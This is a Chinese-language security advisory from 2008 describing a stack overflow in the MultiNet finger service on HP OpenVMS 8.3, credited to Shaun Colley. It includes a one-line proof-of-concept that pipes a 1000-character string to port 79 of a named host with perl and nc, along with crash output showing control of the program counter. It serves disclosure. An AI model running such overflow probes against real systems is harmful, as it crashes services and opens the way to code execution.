发布日期：2008-08-07
更新日期：2008-08-08

受影响系统：

HP OpenVMS 8.3.Alpha
HP OpenVMS 8.3 Integrity

描述：

---

BUGTRAQ  ID: 30589

HP OpenVMS是HP Integrity或AlphaServer服务器中使用的操作系统。

OpenVMS的MultiNet软件包所提供的finger服务默认监听于79端口，在查询时会取用户名作为输入参数，如果远程攻击者向该服务提交了超过250字节的超长字符串的话，就会触发栈溢出，导致控制返回地址并执行任意指令。

<*来源：Shaun Colley （shaunige@yahoo.co.uk）
  
  链接：http://marc.info/?l=bugtraq&m=121812156232673&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

shauny@localhost # echo `perl -e 'print "a"x1000'` | nc -v dahmer.vistech.net 79

?Sorry,
could not find
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
%SYSTEM-F-ACCVIO,
access violation, reason mask=00, virtual address=4141414141414140,
PC=4141414141414140, PS=0000001B%SYSTEM-F-ACCVIO, access violation,
reason mask=00, virtual address=4141414141414140, PC=4141414141414140,
PS=0000001B  Improperly handled condition, image exit forced.
Improperly handled condition, image exit forced.    Signal arguments:
Number = 0000000000000005

建议：

---

厂商补丁：

HP
--
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://h71000.www7.hp.com/

浏览次数：2958
严重程度：0（网友投票）